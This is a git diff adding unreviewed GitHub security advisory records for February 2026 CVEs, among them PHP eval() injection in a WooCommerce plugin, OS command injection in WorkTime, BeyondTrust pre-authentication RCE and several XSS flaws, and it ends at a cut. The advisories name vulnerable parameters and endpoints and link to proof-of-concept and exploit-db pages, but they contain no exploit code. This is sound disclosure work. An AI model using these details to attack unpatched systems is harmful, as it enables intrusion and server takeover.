b/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p572-g32f-hp32", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2296" + ], + "details": "The Product Addons for Woocommerce – Product Options with Custom Fields plugin for WordPress is vulnerable to Code Injection in all versions up to, and including, 3.1.0. This is due to insufficient input validation of the 'operator' field in conditional logic rules within the evalConditions() function, which passes unsanitized user input directly to PHP's eval() function. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject and execute arbitrary PHP code on the server via the conditional logic 'operator' parameter when saving addon form field rules.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2296" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/tags/3.0.19/includes/process/conditional-logic.php#L104" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/tags/3.0.19/includes/process/conditional-logic.php#L84" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/trunk/includes/process/conditional-logic.php#L104" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/trunk/includes/process/conditional-logic.php#L84" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458823%40woo-custom-product-addons&new=3458823%40woo-custom-product-addons&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c1edd7-2421-4dfa-8775-ca0497759d52?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p59g-r9hh-rmr8/GHSA-p59g-r9hh-rmr8.json b/advisories/unreviewed/2026/02/GHSA-p59g-r9hh-rmr8/GHSA-p59g-r9hh-rmr8.json new file mode 100644 index 0000000000000..af4a4450fd49f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p59g-r9hh-rmr8/GHSA-p59g-r9hh-rmr8.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p59g-r9hh-rmr8", + "modified": "2026-02-14T18:30:14Z", + "published": "2026-02-14T18:30:14Z", + "aliases": [ + "CVE-2026-23142" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/damon/sysfs-scheme: cleanup access_pattern subdirs on scheme dir setup failure\n\nWhen a DAMOS-scheme DAMON sysfs directory setup fails after setup of\naccess_pattern/ directory, subdirectories of access_pattern/ directory are\nnot cleaned up. As a result, DAMON sysfs interface is nearly broken until\nthe system reboots, and the memory for the unremoved directory is leaked.\n\nCleanup the directories under such failures.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23142" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/16236b0b4a08fa3e326cf1373ef789dabdc2e30d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/392b3d9d595f34877dd745b470c711e8ebcd225c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/725d4fdaa01bd1161782081f419e1568cc7432e0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ae8ac0066b48ed957bdcab58f0d3543549c57a29" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e9711bd0e64812c694a228cf58c9e6032decee54" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T16:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json b/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json new file mode 100644 index 0000000000000..b6d3c0bc1c860 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5cr-gq3j-93c4", + "modified": "2026-02-13T18:31:24Z", + "published": "2026-02-13T00:32:51Z", + "aliases": [ + "CVE-2025-70845" + ], + "details": "lty628 aidigu v1.9.1 is vulnerable to Cross Site Scripting (XSS) exists in the /setting/ page where the \"intro\" field is not properly sanitized or escaped.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70845" + }, + { + "type": "WEB", + "url": "https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70845" + }, + { + "type": "WEB", + "url": "https://github.com/lty628/aidigu" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5f8-584h-2hr3/GHSA-p5f8-584h-2hr3.json b/advisories/unreviewed/2026/02/GHSA-p5f8-584h-2hr3/GHSA-p5f8-584h-2hr3.json new file mode 100644 index 0000000000000..c01aa419e1044 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5f8-584h-2hr3/GHSA-p5f8-584h-2hr3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5f8-584h-2hr3", + "modified": "2026-02-12T12:31:00Z", + "published": "2026-02-12T12:31:00Z", + "aliases": [ + "CVE-2026-2276" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Wix web application, where the endpoint ' https://manage.wix.com/account/account-settings ', responsible for uploading SVG images, does not properly sanitize the content. An authenticated attacker could upload an SVG file containing embedded JavaScript code, which is stored and subsequently executed when other users view the image. Exploiting this vulnerability allows arbitrary code to be executed in the context of the victim's browser, which could lead to the disclosure of sensitive information or the abuse of the affected user's session.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2276" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-wix-web-application" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T11:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json b/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json new file mode 100644 index 0000000000000..728309edfa2e2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5gf-vhgm-432f", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-15559" + ], + "details": "An unauthenticated attacker can inject OS commands when calling a server API endpoint in NesterSoft WorkTime. The server API call to generate and download the WorkTime client from the WorkTime server is vulnerable in the “guid” parameter. This allows an attacker to execute arbitrary commands on the WorkTime server as NT Authority\\SYSTEM with the highest privileges. Attackers are able to access or manipulate sensitive data and take over the whole server.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15559" + }, + { + "type": "WEB", + "url": "https://r.sec-consult.com/worktime" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T11:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5pv-r96g-5g67/GHSA-p5pv-r96g-5g67.json b/advisories/unreviewed/2026/02/GHSA-p5pv-r96g-5g67/GHSA-p5pv-r96g-5g67.json new file mode 100644 index 0000000000000..ccf96e7b52a83 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5pv-r96g-5g67/GHSA-p5pv-r96g-5g67.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5pv-r96g-5g67", + "modified": "2026-02-13T21:31:38Z", + "published": "2026-02-13T21:31:38Z", + "aliases": [ + "CVE-2025-36532" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36532" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5q9-gghv-g686/GHSA-p5q9-gghv-g686.json b/advisories/unreviewed/2026/02/GHSA-p5q9-gghv-g686/GHSA-p5q9-gghv-g686.json new file mode 100644 index 0000000000000..2faf5cb5f82fa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5q9-gghv-g686/GHSA-p5q9-gghv-g686.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5q9-gghv-g686", + "modified": "2026-02-19T15:30:35Z", + "published": "2026-02-19T15:30:35Z", + "aliases": [ + "CVE-2019-25425" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the VIRUS_ADMIN parameter. Attackers can send POST requests to the smtpconfig endpoint with script payloads to execute arbitrary JavaScript in the context of an administrator's browser session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25425" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-smtpconfig" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5qh-w693-vjqf/GHSA-p5qh-w693-vjqf.json b/advisories/unreviewed/2026/02/GHSA-p5qh-w693-vjqf/GHSA-p5qh-w693-vjqf.json new file mode 100644 index 0000000000000..28faf97b4f502 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5qh-w693-vjqf/GHSA-p5qh-w693-vjqf.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5qh-w693-vjqf", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25408" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the netmask_addr parameter. Attackers can send POST requests to the netwizard2 endpoint with script payloads in the netmask_addr parameter to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25408" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-netwizard" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json b/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json index d4716738bd91d..7648f4aeda355 100644 --- a/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json +++ b/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p5wr-5p37-2wm6", - "modified": "2026-02-07T00:30:27Z", + "modified": "2026-02-17T15:31:33Z", "published": "2026-02-07T00:30:27Z", "aliases": [ "CVE-2026-1731" ], "details": "BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -23,9 +27,21 @@ "type": "WEB", "url": "https://beyondtrustcorp.service-now.com/csm?id=csm_kb_article&sysparm_article=KB0023293" }, + { + "type": "WEB", + "url": "https://github.com/win3zz/CVE-2026-1731" + }, { "type": "WEB", "url": "https://www.beyondtrust.com/trust-center/security-advisories/bt26-02" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-1731" + }, + { + "type": "WEB", + "url": "https://www.greynoise.io/blog/reconnaissance-beyondtrust-rce-cve-2026-1731" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-p5wr-fv9m-v746/GHSA-p5wr-fv9m-v746.json b/advisories/unreviewed/2026/02/GHSA-p5wr-fv9m-v746/GHSA-p5wr-fv9m-v746.json new file mode 100644 index 0000000000000..6bc5a604ad17c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5wr-fv9m-v746/GHSA-p5wr-fv9m-v746.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5wr-fv9m-v746", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2019-25365" + ], + "details": "ChaosPro 2.0 contains a buffer overflow vulnerability in the configuration file path handling that allows attackers to execute arbitrary code by overwriting the Structured Exception Handler. Attackers can craft a malicious configuration file with carefully constructed payload to overwrite memory and gain remote code execution on vulnerable Windows XP systems.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25365" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47551" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/chaospro-buffer-overflow" + }, + { + "type": "WEB", + "url": "http://www.chaospro.de" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json new file mode 100644 index 0000000000000..269fd606d633f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p68h-c56f-p3v6", + "modified": "2026-02-19T18:31:44Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23230" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: split cached_fid bitfields to avoid shared-byte RMW races\n\nis_open, has_lease and on_list are stored in the same bitfield byte in\nstruct cached_fid but are updated in different code paths that may run\nconcurrently. Bitfield assignments generate byte read–modify–write\noperations (e.g. `orb $mask, addr` on x86_64), so updating one flag can\nrestore stale values of the others.\n\nA possible interleaving is:\n CPU1: load old byte (has_lease=1, on_list=1)\n CPU2: clear both flags (store 0)\n CPU1: RMW store (old | IS_OPEN) -> reintroduces cleared bits\n\nTo avoid this class of races, convert these flags to separate bool\nfields.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23230" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3eaa22d688311c708b73f3c68bc6d0c8e3f0f77a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4386f6af8aaedd0c5ad6f659b40cadcc8f423828" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4cfa4c37dcbcfd70866e856200ed8a2894cac578" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/569fecc56bfe4df66f05734d67daef887746656b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c4b9edd55987384a1f201d3d07ff71e448d79c1b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p6xr-26h9-q79c/GHSA-p6xr-26h9-q79c.json b/advisories/unreviewed/2026/02/GHSA-p6xr-26h9-q79c/GHSA-p6xr-26h9-q79c.json new file mode 100644 index 0000000000000..b897eb7773a8d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p6xr-26h9-q79c/GHSA-p6xr-26h9-q79c.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p6xr-26h9-q79c", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25405" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the newLicense parameter. Attackers can send POST requests to the license activation endpoint with script payloads in the newLicense field to execute arbitrary JavaScript in administrators' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25405" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-stored-cross-site-scripting-via-licenseactivation" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p775-8qpw-4j4p/GHSA-p775-8qpw-4j4p.json b/advisories/unreviewed/2026/02/GHSA-p775-8qpw-4j4p/GHSA-p775-8qpw-4j4p.json new file mode 100644 index 0000000000000..60fb3b1d4f541 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p775-8qpw-4j4p/GHSA-p775-8qpw-4j4p.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p775-8qpw-4j4p", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25415" + ], + "details": "Missing Authorization vulnerability in iqonicdesign WPBookit Pro wpbookit-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPBookit Pro: from n/a through <= 1.6.18.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25415" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wpbookit-pro/vulnerability/wordpress-wpbookit-pro-plugin-1-6-18-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p7j7-2wwv-p5hw/GHSA-p7j7-2wwv-p5hw.json b/advisories/unreviewed/2026/02/GHSA-p7j7-2wwv-p5hw/GHSA-p7j7-2wwv-p5hw.json new file mode 100644 index 0000000000000..52903f7fc4727 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p7j7-2wwv-p5hw/GHSA-p7j7-2wwv-p5hw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p7j7-2wwv-p5hw", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2025-8099" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.8 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions, could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8099" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3240210" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/557165" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p7w9-7w5h-q4xc/GHSA-p7w9-7w5h-q4xc.json b/advisories/unreviewed/2026/02/GHSA-p7w9-7w5h-q4xc/GHSA-p7w9-7w5h-q4xc.json new file mode 100644 index 0000000000000..d8fc58822fa66 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p7w9-7w5h-q4xc/GHSA-p7w9-7w5h-q4xc.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p7w9-7w5h-q4xc", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-0727" + ], + "details": "The Accordion and Accordion Slider plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.4.5. This is due to the plugin not properly verifying that a user is authorized to perform an action in the 'wp_aas_save_attachment_data' and 'wp_aas_get_attachment_edit_form' functions. This makes it possible for authenticated attackers, with contributor level access and above, to read and modify attachment metadata including file paths, titles, captions, alt text, and custom links for any attachment on the site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0727" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/accordion-and-accordion-slider/tags/1.4.6/includes/admin/class-wp-aas-admin.php#L294" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1c5108f3-d80c-4646-8d40-3bdd1361c6ab?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json b/advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json new file mode 100644 index 0000000000000..55ec6a360ba64 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p866-9g89-mc5v", + "modified": "2026-02-11T21:30:39Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-52868" + ], + "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52868" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p8gw-hvf3-xmc4/GHSA-p8gw-hvf3-xmc4.json 